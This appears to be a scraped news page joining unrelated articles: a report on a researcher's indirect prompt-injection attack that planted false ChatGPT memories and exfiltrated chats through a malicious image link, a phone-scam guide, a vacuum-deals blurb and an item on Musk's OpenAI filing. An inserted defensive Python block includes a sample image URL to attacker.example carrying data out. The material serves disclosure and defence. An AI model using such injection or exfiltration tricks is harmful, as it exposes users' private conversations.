How a researcher hacked ChatGPT's memory to expose a major security flaw

ChatGPT is an amazing tool, and its developer, OpenAI, keeps adding new features from time to time.

Recently, the company introduced a new memory feature in ChatGPT, which essentially enables it to remember things about you. For example, it can recall your age, gender, philosophical beliefs and pretty much anything else. 

These memories are meant to remain private, but a researcher recently demonstrated how ChatGPT’s artificial intelligence memory features can be manipulated, raising questions about privacy and security.

ChatGPT introduction screen. (Kurt “CyberGuy” Knutsson)

What is ChatGPT’s Memory feature?

ChatGPT’s memory feature is designed to make the chatbot more personal to you. It remembers information that might be useful for future conversations and tailors responses based on that information, even if you open a different chat. For example, if you mention that you’re vegetarian, the next time you ask for recipes, it will provide only vegetarian options. 

You can also train it to remember specific details about you, such as saying, “Remember that I like to watch classic movies.” In future interactions, it will tailor recommendations accordingly. You have control over ChatGPT’s memory. You can reset it, clear specific memories or all memories, or turn this feature off entirely in your settings.

A prompt on ChatGPT. (Kurt “CyberGuy” Knutsson)

The security vulnerability in ChatGPT

As reported by Ars Technica, security researcher Johann Rehberger found that it’s possible to trick the AI into remembering false information through a method called indirect prompt injection. This means the AI can be manipulated into accepting instructions from unreliable sources like emails or blog posts.

For instance, Rehberger demonstrated that he could trick ChatGPT into believing a certain user was 102 years old, lived in a fictional place called the Matrix and thought the Earth was flat. After the AI accepts this made-up information, it will carry it over to all future chats with that user. These false memories could be implanted by using tools like Google Drive or Microsoft OneDrive to store files, upload images or even browse a site like Bing — all of which could be manipulated by a hacker.

Rehberger submitted a follow-up report that included a proof of concept, demonstrating how he could exploit the flaw in the ChatGPT app for macOS. He showed that by tricking the AI into opening a web link containing a malicious image, he could make it send everything a user typed and all the AI’s responses to a server he controlled. This meant that if an attacker could manipulate the AI in this way, they could monitor all conversations between the user and ChatGPT.

Rehberger’s proof-of-concept exploit demonstrated that the vulnerability could be used to exfiltrate all user input in perpetuity. The attack isn’t possible through the ChatGPT web interface, thanks to an API OpenAI rolled out last year. However, it was still possible through the ChatGPT app for macOS.

When Rehberger privately reported the finding to OpenAI in May, the company took it seriously and mitigated this issue by ensuring that the model doesn’t follow any links generated within its own responses, like those involving memory and similar features. 

Johann Rehberger’s ChatGPT conversation. (Johann Rehberger)

OpenAI’s response

After Rehberger shared his proof of concept, OpenAI engineers took action and released a patch to address this vulnerability. They released a new version of the ChatGPT macOS application (version 1.2024.247) that encrypts conversations and fixes the security flaw.

So, while OpenAI has addressed the immediate security flaw, memory manipulation remains a potential avenue for attack, and using AI tools with memory features calls for ongoing vigilance. The incident underscores the evolving nature of security challenges in AI systems.

The company says, “It’s important to note that prompt injection in large language models is an area of ongoing research. As new techniques emerge, we address them at the model layer via instruction hierarchy or application-layer defenses like the ones mentioned.”
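As an added illustration of the two application-layer defenses described above (not OpenAI's code or Rehberger's proof of concept): refusing to fetch links the model itself emitted, and refusing memory writes that originate from browsed pages or uploaded files rather than from the user. The allowlist hosts and the source labels are assumptions.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Hosts the client may still render or fetch from. Hypothetical allowlist;
# the real product's list is not on the page.
ALLOWED_HOSTS = {"openai.com", "chatgpt.com"}

MD_IMAGE = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")
MD_LINK = re.compile(r"(?<!!)\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")
BARE_URL = re.compile(r"https?://[^\s)\]]+")


def _host_allowed(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS)


def sanitize_response(text: str) -> tuple[str, list[str]]:
    """Neutralise URLs in model output that point outside the allowlist.

    A markdown image is the channel the article describes: a client that
    auto-renders ![x](https://attacker/?q=<conversation>) sends the request
    with no click. Untrusted images are dropped; links and bare URLs are
    defanged so they display but never fetch. Returns (clean, blocked_urls).
    """
    blocked: list[str] = []

    def drop_image(m: re.Match) -> str:
        url = m.group("url")
        if _host_allowed(url):
            return m.group(0)
        blocked.append(url)
        return "[image removed: untrusted host]"

    def defang(m: re.Match) -> str:
        url = m.group("url") if "url" in m.groupdict() else m.group(0)
        if _host_allowed(url):
            return m.group(0)
        blocked.append(url)
        # "https[:]//" no longer parses as a URL, so nothing auto-fetches it.
        return m.group(0).replace(url, url.replace("://", "[:]//", 1))

    text = MD_IMAGE.sub(drop_image, text)
    text = MD_LINK.sub(defang, text)
    text = BARE_URL.sub(defang, text)
    return text, blocked


@dataclass
class MemoryStore:
    """Long-term memory that only persists facts the user stated directly."""
    facts: list[str] = field(default_factory=list)
    rejected: list[tuple[str, str]] = field(default_factory=list)

    def remember(self, fact: str, source: str) -> bool:
        # Provenance gate: text that arrived through a tool (browsing, a file
        # from Drive/OneDrive, an uploaded image) is untrusted input and may
        # not write memory, however instruction-like it reads.
        if source != "user":
            self.rejected.append((source, fact))
            return False
        self.facts.append(fact)
        return True


if __name__ == "__main__":
    # Constructed sample reply carrying an injected exfiltration image.
    reply = ("Here is your summary. ![](https://attacker.example/log?d=hi) "
             "See [help](https://chatgpt.com/help) or https://evil.example/x")
    print(sanitize_response(reply))
    mem = MemoryStore()
    mem.remember("Prefers vegetarian recipes", source="user")
    mem.remember("Is 102 and lives in the Matrix", source="browsed_page")
    print(mem.facts, mem.rejected)
```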

How do I disable ChatGPT memory?

If you’re not cool with ChatGPT keeping stuff about you or the chance that it could let a bad actor access your data, you can just turn off this feature in the settings.

  • Open the ChatGPT app or website on your computer or smartphone.
  • Click on the profile icon in the top right corner of the screen.
  • Go to Settings and then select Personalization.
  • Switch the Memory option off, and you’re all set.

This disables ChatGPT’s ability to retain information between conversations, giving you full control over what it remembers or forgets.

A man using ChatGPT on his laptop (Kurt “CyberGuy” Knutsson)

Cybersecurity best practices: Protecting your data in the age of AI

As AI technologies like ChatGPT become more prevalent, it’s crucial to adhere to cybersecurity best practices to protect your personal information. Here are some tips for enhancing your cybersecurity:

1. Regularly review privacy settings: Stay informed about what data is being collected. Periodically check and adjust privacy settings on AI platforms like ChatGPT and others to ensure you’re only sharing information you’re comfortable with.

2. Be cautious about sharing sensitive information: Less is more when it comes to personal data. Avoid disclosing sensitive details such as your full name, address, or financial information in conversations with AI.

3. Use strong, unique passwords: Create passwords that are at least 12 characters long, combining letters, numbers, and symbols, and avoid reusing them across different accounts. Consider using a password manager to generate and store complex passwords.

4. Enable two-factor authentication (2FA): Add an extra layer of security to your ChatGPT and other AI accounts. By requiring a second form of verification, such as a text message code, you significantly reduce the risk of unauthorized access.

5. Keep software and applications up to date: Stay ahead of vulnerabilities. Regular updates often include security patches that protect against newly discovered threats, so enable automatic updates whenever possible.

6. Have strong antivirus software: In an age where AI is everywhere, protecting your data from cyber threats is more important than ever. Adding strong antivirus software to your devices adds a critical layer of protection. The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe. Get my picks for the best 2024 antivirus protection winners for your Windows, Mac, Android & iOS devices.

7. Regularly monitor your accounts: Catch issues early. Frequently check bank statements and online accounts for any unusual activity, which can help you identify potential breaches quickly. 

Kurt’s key takeaways

As AI tools like ChatGPT get smarter and more personal, it’s pretty interesting to think about how they can tailor conversations to us. But, as Johann Rehberger’s findings remind us, there are some real risks involved, especially when it comes to privacy and security. While OpenAI is able to mitigate these issues as they arise, it also shows that we need to keep a close eye on how these features work. It’s all about finding that sweet spot between innovation and keeping our data safe.

What are your thoughts on AI remembering personal details—do you find it helpful, or does it raise privacy concerns for you? Let us know by writing us at Cyberguy.com/Contact

For more of my tech tips and security alerts, subscribe to my free CyberGuy Report Newsletter by heading to Cyberguy.com/Newsletter

Copyright 2024 CyberGuy.com. All rights reserved.


The best Cyber Monday robot vacuum deals you can get from iRobot, Roborock, and more


Robot vacuums are on sale all the time. But this holiday shopping weekend, there have been some fairly significant price drops, which are rolling over from Black Friday into Cyber Monday. These include rarely reduced flagship models like Roborock’s S8 MaxV Ultra and iRobot’s Combo 10 Max. If you’ve been holding out on trying the latest and greatest, now is a good time to dive in.

Deep discounts are also available on some of our favorite midrange and budget bots from Shark and Eufy, and iRobot is slashing prices on its entire line. Read on for our rundown on the best deals on robotic floor cleaners this holiday shopping weekend.

Update, December 1st: Adjusted to reflect current pricing/availability for Cyber Monday and added new deals, including the Roborock Q8 Max Plus.

9 ways scammers can use your phone number to try to trick you


Scammers have various methods when it comes to getting their hands on your phone number. You might think, “Well, what’s the big deal? Isn’t it easy to find someone’s number these days, no matter what?” Yes. And if you’ve already had your fair share of telemarketers call you, maybe you feel like you’ve got it under control.

The problem is that scammers with the right knowledge and the wrong intentions can wreak havoc just by having your phone number in their possession. 

Once they do, they can use it to trick you in all sorts of ways. 

The good news is that by familiarizing yourself with their tactics, you can be one step closer to preventing yourself from falling victim to them. Here’s what you need to know.

Illustration of a scammer using SIM swapping (Kurt “CyberGuy” Knutsson)

9 ways you can get scammed if your phone number falls into the wrong hands

In today’s digital age, your phone number is more than just a way for friends and family to reach you. It can be a gateway for scammers to access your personal information and wreak havoc on your life. From phishing attempts to extortion, the risks are numerous and varied. Here are nine ways scammers can exploit your phone number if it falls into the wrong hands:

1. Phishing for other personal information

Scammers can also use your phone number to launch rather easy phishing attacks. They might send text messages or make calls posing as your bank or a popular online service that you subscribe to. The goal is to call you and trick you into providing login credentials, credit card details or other personal information, which they can then use for fraudulent activities. And once they have all your other information, they can do a lot more damage just by having your phone number as that initial segue.

2. Extortion and blackmail

In some cases, scammers use your phone number for extortion or blackmail. They may claim to have compromising information about you and demand payment to keep it private. By contacting you directly, they can apply continuous pressure, making their threats seem more real and immediate.

One unique way they do this to target elderly people is by pretending to be your grandchild or another relative in distress. The scammer often claims that your grandchild is in an emergency situation — such as needing bail money or medical assistance — and urgently requests financial help. With AI voice cloning technology, they may even be able to use your grandchild’s voice. This emotional manipulation usually gets the victim to pay up.

3. Robocalls and spam messages

This one may not be as dramatic, but your phone number can be sold to robocall and spam message services. These automated systems bombard you with unwanted calls and texts, often promoting scams or fraudulent products. While these may seem like minor annoyances, they can lead to bigger scams if you engage with the messages or follow their instructions. Hang up on them.

Illustration of a scammer with cash in his hand (Kurt “CyberGuy” Knutsson)

4. Phone number spoofing

Phone number spoofing is a common tactic in which scammers disguise their caller ID so the call appears to come from a trusted contact: a number with your own area code, one with the area code where your friends or family live, or even the actual phone number of someone close to you that you would recognize.

This makes it more likely that you’ll answer the call, giving them the opportunity to deceive you into revealing personal information or transferring money. This is, of course, the case when phone spoofing is used against you. But in situations where they use YOUR phone number, they can be scamming those close to you without you even knowing!

5. Impersonating government agencies

With these phone spoofing tactics, scammers can use your phone number to impersonate government officials, such as IRS agents or Social Security administrators. They may call you claiming there’s an urgent issue, like unpaid taxes or suspicious activity involving your Social Security number. This ploy often involves threats of legal action or arrest to pressure you into providing sensitive information or making immediate payments.

6. Calling about fake unpaid invoices

Instead of pretending to be from a government agency, another trick is for scammers to try their luck by posing as a representative from a utility company, like an electric or water company. Scammers will claim that you have an overdue invoice and threaten to cut off your service unless you pay immediately. Using your phone number, they can contact you repeatedly, making the scam seem more legitimate (and pressing).

7. SIM swapping/phone rerouting

SIM swapping or a port-out scam is when scammers transfer your phone number to a new SIM card in their possession. By convincing your mobile carrier to reroute your number, they can receive all your calls and messages, including those containing two-factor authentication codes. This allows them to bypass security measures and take over your online accounts.

8. Stealing your sensitive data

With SIM swapping or port-out techniques, scammers can also use your phone number as a key to access sensitive data stored in your online accounts. By initiating password resets and intercepting verification codes sent via SMS, they can gain unauthorized access to your email, social media and banking accounts, leading to significant personal and financial damage.

9. Setting up fake online accounts

Finally, scammers can use all the tactics above to not only access the accounts you already have but also create fake online accounts in your name. These accounts can be used for a variety of malicious purposes, such as spreading malware, launching further scams or conducting identity theft. The presence of your phone number makes these accounts appear more legitimate, increasing the chances of deceiving others.


A man receiving a scam call (Kurt “CyberGuy” Knutsson)

How to protect yourself from these scams

To protect your phone number from falling into the hands of scammers, here’s what you can do:

1. Be cautious about sharing your phone number publicly: Avoid posting your phone number on public forums, websites or social media platforms where it can be easily accessed by scammers.

2. Limit exposure of your phone number on social media and other online platforms: Use privacy settings to restrict who can see your contact information. Most social media platforms and online services offer privacy settings that allow you to control who can view your personal information. Make sure to review and adjust these settings regularly. Only share your phone number with trusted contacts.

3. Consider using a secondary number for online registrations and transactions: Services like Google Voice can provide you with a secondary number that you can use for online activities, keeping your primary number private.

4. Monitor your accounts regularly for unusual activity: Check your bank accounts, email and other online accounts for any signs of unauthorized access or suspicious activity.

5. Have strong antivirus software: The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe. Get my picks for the best 2024 antivirus protection winners for your Windows, Mac, Android and iOS devices.

6. Use two-factor authentication apps instead of SMS-based verification where possible: Two-factor authentication (2FA) provides an extra layer of security that is more difficult for scammers to bypass compared to SMS-based verification.

7. Use an identity theft protection service: Identity theft companies can monitor personal information like your Social Security number, phone number and email address and alert you if it is being sold on the dark web or being used to open an account. They can also assist you in freezing your bank and credit card accounts to prevent further unauthorized use by criminals.

One of the best parts of using some services is that they might include identity theft insurance of up to $1 million to cover losses and legal fees and a white glove fraud resolution team where a U.S.-based case manager helps you recover any losses. See my tips and best picks on how to protect yourself from identity theft.

8. Remove your personal information from the internet: While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice. They aren’t cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with the information they might find on the dark web, making it harder for them to target you. Check out my top picks for data removal services here.

If scammers already have your phone number

If you suspect that scammers already have your phone number, take the following steps:

Contact your mobile carrier to alert them of the scam calls, especially if they come from the same number. Your carrier may be able to block the number or provide additional security measures.

Consider changing your phone number if the issue persists: If scam calls continue despite your efforts, changing your phone number may be the best solution.

Report any suspicious activity to the appropriate authorities: Contact your local law enforcement or consumer protection agency to report scams and seek advice on further actions.

Consider placing fraud alerts on your accounts: Fraud alerts can help protect your credit and financial accounts from unauthorized access.

Monitor your phone for unusual calls or messages: Keep an eye out for any unexpected calls or messages, and do not respond to them.

Check your phone bill for unauthorized charges: Regularly review your phone bill to ensure there are no unexpected charges, which could indicate that your number has been used fraudulently.

By following these steps, you can significantly reduce the risk of falling victim to phone number scams and protect your personal information.

Kurt’s key takeaways

Scams have become much more sophisticated these days, especially with artificial intelligence, making it easier for scammers to target more people and get away with it. Always be wary of a scam. If you think something seems strange, it’s probably best to go with your gut.

Have you ever experienced a scam involving your phone number? If so, how did you handle it? Let us know by writing us at Cyberguy.com/Contact

For more of my tech tips and security alerts, subscribe to my free CyberGuy Report Newsletter by heading to Cyberguy.com/Newsletter

Elon Musk targets OpenAI’s for-profit transition in a new filing


In a new motion filed late Friday in his lawsuit against OpenAI, Elon Musk’s attorneys have asked for a preliminary injunction to stop OpenAI from transitioning to a for-profit enterprise, reports TechCrunch. They also asked the judge to forbid the company from continuing alleged practices that they say violate US antitrust laws.

Musk’s lawyers claim that because of CEO Sam Altman’s alleged self-dealing, OpenAI “will likely lack sufficient funds to pay damages” if Musk wins the suit. The motion follows reports of OpenAI’s intent to become a for-profit business and that it recently began early talks with regulators to move its structural change forward.

As for antitrust claims, Musk’s lawyers allege that OpenAI and Microsoft “told investors not to fund their mutual competitors,” which they say violates the Sherman Act. And they claim that Musk “verified that at least one major investor” that had previously contributed to an xAI funding round has since “declined to invest in xAI.”

They also allege that OpenAI benefits from “wrongfully obtained competitively sensitive information” gained through Microsoft connections they insist are effectively prohibited under the Clayton Act. The lawyers claim that “the very reason Microsoft obtained its board seat” — referring to Microsoft VP Dee Templeton’s time as a non-voting board member at OpenAI — “was to coordinate business decisions with OpenAI.”

OpenAI spokeswoman Hannah Wong said in a statement emailed to The Verge:

Elon’s fourth attempt, which again recycles the same baseless complaints, continues to be utterly without merit.

Update November 30th: Added statement from OpenAI spokeswoman Hannah Wong.
